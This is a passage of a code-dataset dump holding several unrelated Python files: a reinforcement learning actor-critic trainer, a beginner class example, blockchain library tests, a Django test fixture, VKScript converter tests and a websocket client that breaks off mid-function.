self.critic(states[-1], actions[-1])\n #V = torch.min(Q1, Q2)\n #V = V[:, 0] - self.alpha.detach() * log_probs[-1]\n V = 0\n\n for t in reversed(range(len(rewards))):\n V = rewards[t] - self.alpha.detach() * log_probs[t] + (1.0 - dones[t]) * self.gamma * V\n \n actor_values = []\n\n for aidx in range(self.actor_iterations_per_epoch):\n avg_V = 0\n for bidx in range(self.actor_repeat_per_epoch):\n avg_V += V[aidx * self.actor_repeat_per_epoch + bidx]\n avg_V = avg_V / self.actor_repeat_per_epoch\n actor_values.append(avg_V)\n \n return actor_values, total_log_probs\n\n def _solve(self, network, dataset_states, verbose=True):\n for epoch in range(self.epochs):\n self.epsilon = self.anneal_epsilon(0.9, 0.1, epoch, self.epochs + 1)\n\n #if epoch % 100 == 0:\n # self.fill_replay(network, dataset_states)\n\n package = {\n 'continue': True,\n 'collect_data': False,\n 'policy': self.actor.state_dict(),\n 'critic': self.critic.state_dict(),\n 'logalpha': self.log_alpha.data\n }\n\n for p in range(self.nprocs - 1):\n self.comm.send(package, dest=p+1)\n\n critic_losses = 0#100.0\n critic_itrs = 0\n\n #while critic_itrs < self.critic_min_iterations_per_epoch or (critic_losses >= self.critic_loss_threshold and critic_itrs < self.critic_max_iterations_per_epoch):\n # critic_losses = self.update_critic()\n # critic_itrs += 1\n\n #utils.soft_update_params(self.critic, self.critic_target, self.tau)\n #utils.soft_update_params(self.actor, self.actor_target, self.tau)\n\n actor_values, total_log_probs = self._solve_once(network, dataset_states)\n\n actor_values = torch.stack(actor_values, dim=0)\n actor_loss = -torch.mean(actor_values)\n\n total_log_probs = torch.stack(total_log_probs, dim=0)\n total_log_probs = torch.sum(total_log_probs)\n\n loss = actor_loss\n\n self.manual_set_zero_grads(network)\n\n loss.backward()\n\n all_actor_loss = [actor_loss]\n \n for p in range(self.nprocs - 1):\n grads = self.comm.recv()\n\n for name, w in self.actor.named_parameters():\n w.grad = 
w.grad + grads['policy_grads'][name]\n \n all_actor_loss.append(grads['actor_loss'])\n total_log_probs += grads['total_log_probs']\n\n self.add_transitions_to_replay(grads['transitions'])\n\n all_actor_loss = torch.stack(all_actor_loss, dim=0)\n\n for name, w in self.actor.named_parameters():\n w.grad = w.grad / self.nprocs\n \n torch.nn.utils.clip_grad_norm_(self.actor.parameters(), 5.0)\n\n self.actor_optimizer.step() \n\n #self.update_alpha(total_log_probs) \n\n if verbose:\n print(f\"Iteration {epoch} ; Actor value = {-torch.mean(all_actor_loss)} ; Critic loss = {critic_losses} ; Alpha = {self.alpha.detach()}\")\n sys.stdout.flush()\n\n package = {\n 'continue': False\n }\n for p in range(self.nprocs - 1):\n self.comm.send(package, dest=p+1)\n \n def manual_set_zero_grads(self, network):\n self.actor_optimizer.zero_grad()\n self.critic_optimizer.zero_grad()\n network.optim.zero_grad()\n\n def fill_replay(self, network, dataset_states):\n package = {\n 'continue': True,\n 'collect_data': True,\n 'epsilon': self.epsilon,\n 'policy': self.actor.state_dict(),\n 'critic': self.critic.state_dict()\n }\n\n for p in range(self.nprocs - 1):\n self.comm.send(package, dest=p+1)\n\n with torch.no_grad():\n for _ in range(self.critic_warmup_epochs):\n _, _, = self._solve_once(network, dataset_states, epsilon_greedy=True)\n \n for p in range(self.nprocs - 1):\n transitions = self.comm.recv()\n self.add_transitions_to_replay(transitions)\n \n def process_fill_replay(self, policy, critic, network, dataset_states):\n self.actor.load_state_dict(policy)\n self.critic.load_state_dict(critic)\n\n starting_idx = self.replay_buffer.idx\n \n with torch.no_grad():\n for _ in range(self.critic_warmup_epochs):\n _, _, = self._solve_once(network, dataset_states, epsilon_greedy=True)\n \n final_idx = self.replay_buffer.idx\n if starting_idx > final_idx:\n final_idx = self.replay_buffer.capacity\n \n transitions = {\n 'obses': self.replay_buffer.obses[starting_idx:final_idx],\n 'actions': self.replay_buffer.actions[starting_idx:final_idx],\n 'rewards': self.replay_buffer.rewards[starting_idx:final_idx],\n 'next_obses': self.replay_buffer.next_obses[starting_idx:final_idx],\n 'dones': 1.0 - self.replay_buffer.not_dones[starting_idx:final_idx]\n }\n \n return transitions\n\n def add_transitions_to_replay(self, transitions):\n obses = transitions['obses']\n actions = transitions['actions']\n rewards = transitions['rewards']\n next_obses = transitions['next_obses']\n dones = transitions['dones']\n self.replay_buffer.add(obses.detach(), actions.detach(), rewards.detach(), next_obses.detach(), dones.detach(), False)\n\n def collect_rollouts(self, policy, critic, network, dataset_states):\n self.actor.load_state_dict(policy)\n self.critic.load_state_dict(critic)\n\n starting_idx = self.replay_buffer.idx\n actor_values, total_log_probs = self._solve_once(network, dataset_states)\n final_idx = self.replay_buffer.idx\n if starting_idx > final_idx:\n final_idx = self.replay_buffer.capacity\n\n actor_values = torch.stack(actor_values, dim=0)\n actor_loss = -torch.mean(actor_values)\n\n loss = actor_loss\n\n self.manual_set_zero_grads(network)\n\n loss.backward()\n\n policy_grads = dict()\n \n for name, w in self.actor.named_parameters():\n policy_grads[name] = w.grad\n \n total_log_probs = torch.stack(total_log_probs, dim=0)\n total_log_probs = torch.sum(total_log_probs)\n\n transitions = {\n 'obses': self.replay_buffer.obses[starting_idx:final_idx],\n 'actions': self.replay_buffer.actions[starting_idx:final_idx],\n 'rewards': 
self.replay_buffer.rewards[starting_idx:final_idx],\n 'next_obses': self.replay_buffer.next_obses[starting_idx:final_idx],\n 'dones': 1.0 - self.replay_buffer.not_dones[starting_idx:final_idx]\n }\n\n return policy_grads, actor_loss, total_log_probs, transitions\n\n def solve_surrogate(self, network):\n #aug_replay_buffer = LazyPrioritizedMultiStepMemory(self.capacity, self.obs_dim, self.device, beta_steps=self.surrogate_epochs, multi_step=1)\n aug_replay_buffer = ReplayBuffer(obs_shape=[self.obs_dim], action_shape=[self.action_dim - self.noise_dim], capacity=int(self.capacity), device=self.device)\n\n for idx in range(len(self.surrogate_replay_buffer)):\n state = self.surrogate_replay_buffer.obses[idx]\n action = self.surrogate_replay_buffer.actions[idx]\n reward = self.surrogate_replay_buffer.rewards[idx]\n next_state = self.surrogate_replay_buffer.next_obses[idx]\n done = 1.0 - self.surrogate_replay_buffer.not_dones[idx]\n aug_replay_buffer.add(state, action, reward, next_state, done, False)\n\n max_reward = -1000000.0\n\n with torch.no_grad():\n for idx in range(0, len(self.surrogate_replay_buffer), self.surrogate_batchsize):\n initial_obs = []\n for j in range(self.surrogate_batchsize):\n init_obs = torch.from_numpy(self.surrogate_replay_buffer.obses[idx + j]).to(self.device)\n #init_obs = self.surrogate_replay_buffer.obses[idx + j].clone()\n for _ in range(self.actor_repeat_per_epoch):\n initial_obs.append(init_obs)\n obs = torch.stack(initial_obs, dim=0)\n\n for t in range(self.horizon):\n dist = self.actor(obs)\n action = dist.sample()\n\n log_prob = dist.log_prob(action).sum(-1)\n out_action = action * self.action_range.unsqueeze(dim=0)\n\n act_action = out_action[:, 0:-self.noise_dim]\n\n z = out_action[:, -self.noise_dim:]\n\n w = network.sample(1, z)\n\n next_obs, reward, done = network.primarynet.batch_mbrl(obs, act_action, w)\n\n max_reward = max(max_reward, float(torch.max(reward)))\n \n next_obs = next_obs[:, 0]\n reward = reward[:, 0, 0]\n done = done[:, 0, 0]\n\n for jdx in range(self.surrogate_batchsize * self.actor_repeat_per_epoch):\n aug_replay_buffer.add(obs[jdx].cpu(),\n action[jdx, 0:-self.noise_dim].cpu(), \n reward[jdx].cpu(), \n next_obs[jdx].cpu(), \n (done[jdx] > 0.5).float().cpu(),\n False\n )\n \n obs = next_obs\n\n print(f\"Maximum reward = {max_reward}\")\n\n target_noise = 0.1\n noise_clip = 0.2\n act_limit = 1.0\n\n for epoch in range(self.surrogate_epochs):\n obs, action, reward, next_obs, not_done, _ = aug_replay_buffer.sample(self.surrogate_batchsize)\n #batch, weights = aug_replay_buffer.sample(self.surrogate_batchsize)\n #obs, action, reward, next_obs, done = batch\n #not_done = 1.0 - done\n\n with torch.no_grad():\n pi_targ = self.surrogate_actor_target(next_obs)\n # Target policy smoothing\n epsilon = torch.randn_like(pi_targ) * target_noise\n epsilon = torch.clamp(epsilon, -noise_clip, noise_clip)\n next_action = pi_targ + epsilon\n next_action = torch.clamp(next_action, -act_limit, act_limit)\n \n target_Q1, target_Q2 = self.surrogate_critic_target(next_obs, next_action)\n target_V = torch.min(target_Q1, target_Q2)# - self.surrogate_alpha.detach() * log_prob\n target_Q = reward + (not_done * self.gamma * target_V)\n target_Q = target_Q.detach()\n\n # get current Q estimates\n current_Q1, current_Q2 = self.surrogate_critic(obs, action)\n #errors = 0.5 * (torch.abs(current_Q1.detach() - target_Q) + torch.abs(current_Q2.detach() - target_Q))\n errors = torch.abs(current_Q1.detach() - target_Q)\n #critic_loss = torch.mean((current_Q1 - 
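# The surrogate training step above computes the standard TD3 target:
# target-policy smoothing noise, then a clipped double-Q backup. Distilled into
# a free function (a sketch; the actor/critic callables and tensor shapes are
# assumed, not taken from this module):
import torch

def td3_target(reward, not_done, next_obs, actor_target, critic_target,
               gamma=0.99, target_noise=0.1, noise_clip=0.2, act_limit=1.0):
    with torch.no_grad():
        pi = actor_target(next_obs)
        eps = torch.clamp(torch.randn_like(pi) * target_noise, -noise_clip, noise_clip)
        next_action = torch.clamp(pi + eps, -act_limit, act_limit)
        q1, q2 = critic_target(next_obs, next_action)
        return reward + not_done * gamma * torch.min(q1, q2)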
target_Q).pow(2) * weights) + torch.mean((current_Q2 - target_Q).pow(2) * weights)\n critic_loss = torch.mean((current_Q1 - target_Q).pow(2)) + torch.mean((current_Q2 - target_Q).pow(2))\n \n # Optimize the critic\n self.surrogate_critic_optimizer.zero_grad()\n critic_loss.backward()\n torch.nn.utils.clip_grad_norm_(self.surrogate_critic.parameters(), 5.0)\n self.surrogate_critic_optimizer.step()\n\n #aug_replay_buffer.update_priority(errors)\n\n if (epoch + 1) % self.surrogate_target_update_frequency == 0:\n utils.soft_update_params(self.surrogate_critic, self.surrogate_critic_target, self.surrogate_tau)\n utils.soft_update_params(self.surrogate_actor, self.surrogate_actor_target, self.surrogate_tau)\n\n obs, action, reward, next_obs, not_done, _ = aug_replay_buffer.sample(self.surrogate_batchsize)\n\n \"\"\"\n dist = self.surrogate_actor(obs)\n action = dist.rsample()\n log_prob = dist.log_prob(action).sum(-1, keepdim=True)\n actor_Q1, actor_Q2 = self.surrogate_critic(obs, action)\n\n actor_Q = torch.min(actor_Q1, actor_Q2)\n actor_loss = (- actor_Q * weights).mean()\n #actor_loss = (weights * (self.surrogate_alpha.detach() * log_prob - actor_Q)).mean()\n \"\"\"\n action = self.surrogate_actor(obs)\n actor_Q1, actor_Q2 = self.surrogate_critic(obs, action)\n #actor_loss = -(actor_Q1 * weights).mean()\n actor_loss = -(actor_Q1).mean()\n\n # optimize the actor\n self.surrogate_actor_optimizer.zero_grad()\n actor_loss.backward()\n torch.nn.utils.clip_grad_norm_(self.surrogate_actor.parameters(), 5.0)\n self.surrogate_actor_optimizer.step()\n \n # Alpha\n #alpha_loss = (self.surrogate_alpha * (-log_prob - self.target_entropy).detach()).mean()\n\n #self.surrogate_log_alpha_optimizer.zero_grad()\n #alpha_loss.backward()\n #torch.nn.utils.clip_grad_norm_([self.surrogate_log_alpha], 5.0)\n #self.surrogate_log_alpha_optimizer.step()\n \n print(f\"Surrogate Iteration {epoch} ; Actor loss = {actor_loss} ; Critic loss = {critic_loss} ; Alpha = {self.surrogate_alpha.detach()}\")\n sys.stdout.flush()\n\n def full_reset(self):\n self.surrogate_actor = DiagGaussianActor(self.obs_dim, self.action_dim - self.noise_dim, self.actor_hidden_dim, self.actor_hidden_layers).to(self.device)\n self.surrogate_actor_target = DiagGaussianActor(self.obs_dim, self.action_dim - self.noise_dim, self.actor_hidden_dim, self.actor_hidden_layers).to(self.device)\n self.surrogate_actor_target.load_state_dict(self.surrogate_actor.state_dict())\n self.surrogate_actor_target.requires_grad = False\n self.surrogate_actor_optimizer = torch.optim.Adam(self.surrogate_actor.parameters(), lr=1e-3, betas=self.actor_betas)\n\n self.surrogate_critic = DoubleQCritic(self.obs_dim, self.action_dim - self.noise_dim, self.critic_hidden_dim, self.critic_hidden_layers).to(self.device)\n self.surrogate_critic_target = DoubleQCritic(self.obs_dim, self.action_dim - self.noise_dim, self.critic_hidden_dim, self.critic_hidden_layers).to(self.device)\n self.surrogate_critic_target.load_state_dict(self.surrogate_critic.state_dict())\n self.surrogate_critic_target.requires_grad = False\n self.surrogate_critic_optimizer = torch.optim.Adam(self.surrogate_critic.parameters(), lr=1e-3, betas=self.critic_betas)\n\n self.surrogate_log_alpha = torch.tensor(np.log(self.init_alpha)).to(self.device)\n self.surrogate_log_alpha.requires_grad = True\n self.surrogate_log_alpha_optimizer = torch.optim.Adam([self.surrogate_log_alpha], lr=1e-4, betas=[0.9, 0.999])\n\n self.actor = SacDiagGaussianActor(self.obs_dim, self.action_dim, self.actor_hidden_dim, 
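# Note for full_reset here: assigning `requires_grad = False` directly on an
# nn.Module only creates a plain Python attribute -- it does not freeze the
# target networks' parameters. The conventional idiom flips the flag on each
# parameter:
import torch.nn as nn

def freeze(net: nn.Module) -> None:
    for p in net.parameters():
        p.requires_grad = False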
self.actor_hidden_layers, self.actor_logstd_bounds).to(self.device)\n self.actor_target = SacDiagGaussianActor(self.obs_dim, self.action_dim, self.actor_hidden_dim, self.actor_hidden_layers, self.actor_logstd_bounds).to(self.device)\n self.actor_target.load_state_dict(self.actor.state_dict())\n self.actor_target.requires_grad = False\n self.actor_optimizer = torch.optim.Adam(self.actor.parameters(), lr=self.actor_lr, betas=self.actor_betas)\n\n self.critic = DoubleQCritic(self.obs_dim, self.action_dim, self.critic_hidden_dim, self.critic_hidden_layers).to(self.device)\n self.critic_target = DoubleQCritic(self.obs_dim, self.action_dim, self.critic_hidden_dim, self.critic_hidden_layers).to(self.device)\n self.critic_target.load_state_dict(self.critic.state_dict())\n self.critic_target.requires_grad = False\n self.critic_optimizer = torch.optim.Adam(self.critic.parameters(), lr=self.critic_lr, betas=self.critic_betas)\n\n self.log_alpha = torch.tensor(np.log(self.init_alpha)).to(self.device)\n self.log_alpha.requires_grad = True\n self.target_entropy = -self.action_dim\n self.log_alpha_optimizer = torch.optim.Adam([self.log_alpha], lr=1e-3, betas=[0.9, 0.999])\n\n def half_reset(self):\n self.actor = SacDiagGaussianActor(self.obs_dim, self.action_dim, self.actor_hidden_dim, self.actor_hidden_layers, self.actor_logstd_bounds).to(self.device)\n self.actor_target = SacDiagGaussianActor(self.obs_dim, self.action_dim, self.actor_hidden_dim, self.actor_hidden_layers, self.actor_logstd_bounds).to(self.device)\n self.actor_target.load_state_dict(self.actor.state_dict())\n self.actor_target.requires_grad = False\n self.actor_optimizer = torch.optim.Adam(self.actor.parameters(), lr=self.actor_lr, betas=self.actor_betas)\n\n self.critic = DoubleQCritic(self.obs_dim, self.action_dim, self.critic_hidden_dim, self.critic_hidden_layers).to(self.device)\n self.critic_target = DoubleQCritic(self.obs_dim, self.action_dim, self.critic_hidden_dim, self.critic_hidden_layers).to(self.device)\n self.critic_target.load_state_dict(self.critic.state_dict())\n self.critic_target.requires_grad = False\n self.critic_optimizer = torch.optim.Adam(self.critic.parameters(), lr=self.critic_lr, betas=self.critic_betas)\n\n self.log_alpha = torch.tensor(np.log(self.init_alpha)).to(self.device)\n self.log_alpha.requires_grad = True\n self.target_entropy = -self.action_dim\n self.log_alpha_optimizer = torch.optim.Adam([self.log_alpha], lr=1e-3, betas=[0.9, 0.999])\n\n def reset(self):\n self.replay_buffer = ArtificialReplayBuffer(obs_shape=[self.obs_dim], action_shape=[self.action_dim], capacity=int(self.capacity), device=self.device)\n torch.cuda.empty_cache()\n\n def process_reset(self):\n pass\n\n def save(self, PATH):\n sd = {\n 'actor': self.actor.state_dict(),\n 'critic': self.critic.state_dict(),\n 'log_alpha': self.log_alpha.data,\n 'actor_optim': self.actor_optimizer.state_dict(),\n 'critic_optim': self.critic_optimizer.state_dict(),\n 'alpha_optim': self.log_alpha_optimizer.state_dict()\n }\n torch.save(sd, PATH)\n \n def load(self, PATH):\n all_dict = torch.load(PATH)\n self.actor.load_state_dict(all_dict['actor'])\n self.actor_target.load_state_dict(all_dict['actor'])\n self.critic.load_state_dict(all_dict['critic'])\n self.critic_target.load_state_dict(all_dict['critic'])\n self.log_alpha.data = all_dict['log_alpha']\n self.actor_optimizer.load_state_dict(all_dict['actor_optim'])\n self.critic_optimizer.load_state_dict(all_dict['critic_optim'])\n 
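# `utils.soft_update_params`, called from solve_surrogate above, is defined
# elsewhere; the conventional Polyak (exponential-moving-average) update it is
# expected to perform looks like this sketch:
import torch

def soft_update_params(net, target_net, tau):
    with torch.no_grad():
        for p, tp in zip(net.parameters(), target_net.parameters()):
            tp.data.copy_(tau * p.data + (1.0 - tau) * tp.data)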
self.log_alpha_optimizer.load_state_dict(all_dict['alpha_optim'])\n","sub_path":"olds/mbrl_parallel_wq2.py","file_name":"mbrl_parallel_wq2.py","file_ext":"py","file_size_in_byte":29308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"305004659","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 18 22:54:48 2019\n\n@author: MSI\n\"\"\"\n\nclass Mahasiswa():\n\tnama = 'nama'\n\n\tdef belajar(self, kondisi): #self itu kaya this\n\t\tprint(self.nama,'sedang belajar', kondisi)\n\n\tdef tidur(self):\n\t\tprint(self.nama,'tidur di kelas')\n\n# main programnya\n\notong = Mahasiswa()\nucup = Mahasiswa()\n\notong.nama = \"otong surotong\"\nucup.nama = \"michael ucup\"\n\nprint(otong.nama)\nprint(ucup.nama)\n\notong.belajar('dengan giat')\nucup.tidur()","sub_path":"18. Pengenalan Class.py","file_name":"18. Pengenalan Class.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"155068137","text":"\"\"\"\n Test ocean class\n\n\"\"\"\n\nimport logging\nimport os\nimport pytest\n\nfrom web3 import Web3, HTTPProvider\n\nfrom squid_py.constants import (\n KEEPER_CONTRACTS\n)\n\nfrom squid_py import (\n Ocean,\n OceanInvalidContractAddress\n)\n\nfrom squid_py.utils import (\n Web3Helper,\n convert_to_bytes,\n convert_to_string,\n convert_to_text\n)\n\nfrom squid_py.config import (\n Config,\n)\n\nfrom squid_py.keeper import (\n Contracts\n)\n\n\ndef get_keeper_path(path = ''):\n if os.path.exists(path):\n pass\n elif os.getenv('VIRTUAL_ENV'):\n path = os.path.join(os.getenv('VIRTUAL_ENV'), 'contracts')\n else:\n path = os.path.join(site.PREFIXES[0], 'contracts')\n return path\n\ndef test_ocean_contracts():\n os.environ['CONFIG_FILE'] = 'config_local.ini'\n os.environ['KEEPER_URL'] = 'http://0.0.0.0:8545'\n ocean = Ocean()\n assert ocean.contracts.token is not None\n assert ocean.keeper_url == os.environ['KEEPER_URL']\n\n\n\ndef test_ocean_contracts_with_conf(caplog):\n caplog.set_level(logging.DEBUG)\n # Need to ensure config.ini is populated!\n ocean = Ocean(keeper_url='http://0.0.0.0:8545', config_file='config_local.ini')\n config = Config('config_local.ini')\n validate_market_addess = ocean.web3.toChecksumAddress(config.get(KEEPER_CONTRACTS, 'market.address'))\n assert ocean.contracts.market.address == validate_market_addess\n assert ocean.address_list\n assert ocean.address_list['market'] == validate_market_addess\n assert ocean.gas_limit == int(config.get(KEEPER_CONTRACTS, 'gas_limit'))\n assert ocean.provider_url == 'http://localhost:5000'\n\n\ndef test_split_signature():\n ocean = Ocean(keeper_url='http://0.0.0.0:8545', config_file='config_local.ini')\n signature = b'\\x19\\x15!\\xecwnX1o/\\xdeho\\x9a9\\xdd9^\\xbb\\x8c2z\\x88!\\x95\\xdc=\\xe6\\xafc\\x0f\\xe9\\x14\\x12\\xc6\\xde\\x0b\\n\\xa6\\x11\\xc0\\x1cvv\\x9f\\x99O8\\x15\\xf6f\\xe7\\xab\\xea\\x982Ds\\x0bX\\xd9\\x94\\xa42\\x01'\n split_signature = ocean.helper.split_signature(signature=signature)\n assert split_signature.v == 28\n assert split_signature.r == b'\\x19\\x15!\\xecwnX1o/\\xdeho\\x9a9\\xdd9^\\xbb\\x8c2z\\x88!\\x95\\xdc=\\xe6\\xafc\\x0f\\xe9'\n assert split_signature.s == b'\\x14\\x12\\xc6\\xde\\x0b\\n\\xa6\\x11\\xc0\\x1cvv\\x9f\\x99O8\\x15\\xf6f\\xe7\\xab\\xea\\x982Ds\\x0bX\\xd9\\x94\\xa42'\n\n\ndef test_convert():\n input_text = \"my text\"\n print(\"output %s\" % convert_to_string(convert_to_bytes(input_text)))\n assert convert_to_text(convert_to_bytes(input_text)) == 
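# Translations of the Indonesian comments in the Mahasiswa record above:
# "self itu kaya this" = "self is like `this`"; "main programnya" = "the main program".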
input_text\n\ndef test_accounts():\n ocean = Ocean(keeper_url='http://0.0.0.0:8545', config_file='config_local.ini')\n assert ocean.accounts\n assert len(ocean.accounts) == 10\n for account in ocean.accounts:\n assert 'address' in account\n assert 'token' in account\n assert 'ether' in account\n assert account['ether'] > 0\n assert isinstance(account['token'], int)\n\ndef test_provider_access():\n ocean = Ocean(provider_url = None)\n assert ocean\n assert ocean.provider_url == None\n config = Config('config_local.ini')\n keeper_url = 'http://0.0.0.0:8545'\n address_list = {\n 'market' : config.get(KEEPER_CONTRACTS, 'market.address'),\n 'token' : config.get(KEEPER_CONTRACTS, 'token.address'),\n 'auth' : config.get(KEEPER_CONTRACTS, 'auth.address'),\n }\n\n ocean = Ocean(keeper_url=keeper_url, provider_url = None, address_list = address_list)\n assert ocean\n assert ocean.contracts.market\n assert ocean.contracts.token\n assert ocean.contracts.auth\n\n # the same above but for a low level access to the modules within squid-py\n web3 = Web3(HTTPProvider(keeper_url))\n assert web3\n helper = Web3Helper(web3)\n assert helper\n contracts = Contracts(helper, get_keeper_path(), address_list)\n assert contracts\n\ndef test_errors_raised():\n config = Config('config_local.ini')\n address_list = {\n 'market' : config.get(KEEPER_CONTRACTS, 'market.address'),\n 'token' : config.get(KEEPER_CONTRACTS, 'token.address'),\n 'auth' : config.get(KEEPER_CONTRACTS, 'auth.address'),\n }\n\n with pytest.raises(TypeError):\n ocean = Ocean(keeper_url = None)\n assert ocean == None\n ocean = Ocean()\n assert ocean == None\n\n with pytest.raises(ValueError):\n ocean = Ocean(web3 = None)\n assert ocean == None\n\n with pytest.raises(FileNotFoundError):\n ocean = Ocean(config_file='error_file.txt')\n assert ocean == None\n\n with pytest.raises(OceanInvalidContractAddress, message = \"Invalid contract address for keeper contract 'market'\"):\n ocean = Ocean(address_list = { 'market': '0x00'} )\n assert ocean == None\n\n with pytest.raises(OceanInvalidContractAddress, message = \"Invalid contract address for keeper contract 'market'\"):\n ocean = Ocean(address_list = { 'market': address_list['market'] + 'FF' } )\n assert ocean == None\n\n with pytest.raises(OceanInvalidContractAddress, message = \"Invalid contract address for keeper contract 'market'\"):\n ocean = Ocean(address_list = { 'market': address_list['market'][4:] } )\n assert ocean == None\n","sub_path":"tests/test_ocean.py","file_name":"test_ocean.py","file_ext":"py","file_size_in_byte":5114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"162769537","text":"from food_items.models import Product, Store, BestProductSelection, Category\nfrom django.contrib.auth.models import User\n\ndef set_up_db():\n Category.objects.bulk_create([\n Category(name=\"Snacks\"),\n Category(name=\"Snacks sucrés\"),\n Category(name=\"Petit-déjeuners\"),\n Category(name=\"Biscuits\"),\n Category(name=\"Biscuits et gâteaux\"),\n Category(name=\"Snacks salés\")\n ])\n Store.objects.bulk_create([\n Store(name=\"Carrefour\"),\n Store(name=\"Leclerc\"),\n Store(name=\"Magasins U\"),\n Store(name=\"REWE\")])\n Product.objects.bulk_create([\n Product(name=\"Nutella Allégé\",\n brand=\"Nutella Ferrero\",\n code=\"01234567891011\",\n last_modified=\"2020-11-11 15:45+0200\",\n nutrition_score=\"E\"\n ),\n Product(name=\"Nutella Délicieux\",\n brand=\"Nutella Ferrero\",\n code=\"32134567891011\",\n last_modified=\"2020-11-11 
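# Notes on test_errors_raised above: the `assert ocean == None` statements sit
# inside the `with pytest.raises(...)` blocks after the call that raises, so
# they never execute; and the `message=` keyword to pytest.raises was
# deprecated and later removed (pytest 5). The current idiom checks the
# exception text with `match=`:
import pytest

def test_raises_idiom():
    with pytest.raises(ValueError, match="bad value"):
        raise ValueError("bad value")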
19:45+0200\",\n nutrition_score=\"C\"\n )])\n p1 = Product.objects.get(code=\"01234567891011\")\n p2 = Product.objects.get(code=\"32134567891011\")\n s1 = Store.objects.get(name=\"Carrefour\")\n s2 = Store.objects.get(name=\"Leclerc\")\n p1.stores.set([s1, s2])\n p2.stores.set([s2])\n p1.save()\n p2.save()\n\n User.objects.bulk_create([\n User(first_name=\"Fabrice\",\n last_name=\"Jaouën\",\n email=\"fabricejaouen@yahoo.com\",\n is_superuser=True,\n username=\"admin\",\n password=\"pwd\",\n is_staff=True,\n is_active=True,\n date_joined=\"2020-11-01T05:48:00.941Z\"),\n User(first_name=\"John\",\n last_name=\"Doe\",\n email=\"fabricejaouen@yahoo.com\",\n is_superuser=False,\n username=\"user\",\n password='pwd',\n is_staff=False,\n is_active=True,\n date_joined=\"2020-11-01T05:48:00.941Z\"),\n ])\n\n u1 = User.objects.get(username=\"user\")\n p1.selection.set([u1])\n p2.selection.set([u1])\n\n\n","sub_path":"papounet_diet/food_items/tests/fixture.py","file_name":"fixture.py","file_ext":"py","file_size_in_byte":2491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"232929712","text":"from vkbottle import vkscript\n\nBASIC_CYCLE = \"var a=%A%;var some_list=[];while(a<100){API.users.get({user_id:a});a = a + 1;};return some_list;\"\n\n\n@vkscript\ndef basic_cycle(api, a: int = 10):\n some_list = []\n while a < 100:\n api.users.get(user_id=a)\n a += 1\n return some_list\n\n\n@vkscript\ndef types(api):\n a = 5.1\n b = 5 * a\n results = [b, b - 2]\n _ = {\"a\": 1, \"b\": 2}\n _ = True\n _ = 3 - 3.3 + 3.0 * 0.3 / 33 % 3\n _ = \"string\"\n\n if a < 5:\n pass\n elif b > 25:\n a += 1\n a -= 1\n else:\n while a < b:\n a *= 1.1\n\n for i in results:\n results.append(i ** 2)\n results.pop()\n return results\n\n\ndef test_vkscript():\n assert basic_cycle(a=10) == BASIC_CYCLE.replace(\"%A%\", \"10\")\n assert basic_cycle(a=94) == BASIC_CYCLE.replace(\"%A%\", \"94\")\n assert types()\n","sub_path":"tests/vkscript_converter_test.py","file_name":"vkscript_converter_test.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"188105567","text":"import json\nimport datetime\nfrom threading import Thread\nimport time\nimport logging\nimport urllib\nimport queue\nimport threading\nimport uuid\nimport asyncio\nfrom autobahn.asyncio.websocket import WebSocketClientFactory, WebSocketClientProtocol\nfrom autobahn.websocket.protocol import parseWsUrl\n\nfrom SAMI import MessageQueues\n\nfrom SAMI import SAMIRequests\nfrom utils.Logging import Logger\n\n\ndef mylog(flow, direction, message):\n Logger().info('{flow:10.10} {direction} {message}'.format(flow=flow, message=message, direction=direction))\n\ncurrent_cids = {}\ncurrent_cids_lock = threading.Lock()\n\n\nclass LiveProtocol(WebSocketClientProtocol):\n name = \"Live\"\n opened = False\n\n def onOpen(self):\n mylog(self.name, '==', '{\"type\": \"opened\"}')\n self.factory.loop.call_later(1, self.tick)\n\n def tick(self):\n self.opened = True\n\n def onMessage(self, payload, isBinary):\n mylog(self.name, '<=', payload)\n\n def onClose(self, clean, status, message):\n mylog(self.name, '==', '{\"type\": \"closed\", \"message\": \"' + str(message) + '\"}')\n\n\nclass LoopThread(Thread):\n def __init__(self):\n Thread.__init__(self)\n self.loop = None\n self.protocol = None\n\n def run(self):\n self.loop = asyncio.new_event_loop()\n asyncio.set_event_loop(self.loop)\n\n live_params = {'uid': SAMIRequests.get_uid(), 
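# LoopThread above runs an asyncio event loop inside a daemon thread. Two
# caveats: loop.stop() is not thread-safe and should be scheduled with
# call_soon_threadsafe when invoked from another thread, and the
# generator-based @asyncio.coroutine style used here is deprecated in favour
# of async/await. A minimal modern sketch of the same background-loop pattern:
import asyncio
import threading

def start_background_loop():
    loop = asyncio.new_event_loop()
    thread = threading.Thread(target=loop.run_forever, daemon=True)
    thread.start()
    return loop, thread

loop, thread = start_background_loop()
future = asyncio.run_coroutine_threadsafe(asyncio.sleep(0.01, result=42), loop)
assert future.result(timeout=5) == 42
loop.call_soon_threadsafe(loop.stop)  # thread-safe shutdown request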
'Authorization': 'Bearer ' + SAMIRequests.get_token()}\n live_url = SAMIRequests.sami_live()\n print(live_url + '?' + urllib.parse.urlencode(live_params)) \n liveCoro = getCoroutineWS(self.loop, live_url + '?' + urllib.parse.urlencode(live_params), LiveProtocol)\n\n (transport, protocol) = self.loop.run_until_complete(liveCoro)\n self.protocol = protocol\n\n @asyncio.coroutine\n def wait_websocket_ready(protocol):\n while not protocol.opened:\n yield from asyncio.sleep(1)\n self.loop.run_until_complete(wait_websocket_ready(protocol))\n self.loop.run_forever()\n\n def stop(self):\n self.loop.stop()\n\n\ndef getCoroutineWS(loop, url, protocol):\n factory = WebSocketClientFactory(url, debug=False)\n factory.protocol = protocol\n isSecure, host, port, resource, path, params = parseWsUrl(url)\n coroutine = loop.create_connection(factory, host, port, ssl=isSecure)\n return coroutine\n\ndef init_loop():\n loop_thread = LoopThread()\n loop_thread.setName('event loop thread')\n loop_thread.daemon = True\n loop_thread.start()\n while loop_thread.loop is None:\n time.sleep(1)\n while loop_thread.protocol is None:\n time.sleep(1)\n while not loop_thread.protocol.opened:\n 